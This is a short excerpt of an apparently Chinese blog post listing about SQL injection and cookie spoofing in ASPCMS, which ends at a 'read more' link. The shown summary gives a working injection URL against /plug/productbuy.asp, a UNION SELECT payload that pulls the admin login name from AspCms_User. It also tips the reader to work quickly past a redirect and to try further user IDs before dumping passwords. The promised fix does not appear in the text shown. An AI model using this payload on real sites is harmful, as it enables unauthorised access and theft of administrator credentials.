aspcms注入 cookies欺骗及修复
摘要:
漏洞出现在/plug/productbuy.asp对接收的参数id没有进行过滤而导致的注入漏洞注入后的页面有跳转,所以要快,建议用快捷键复制爆用户名/plug/productbuy.asp?id=2 union select 1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from AspCms_User where userid=1这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4………..爆密码/plug/pr 阅读全文
posted @ 2012-10-13 21:54 =_=! 阅读(657) 评论(0) 推荐(0)
浙公网安备 33010602011771号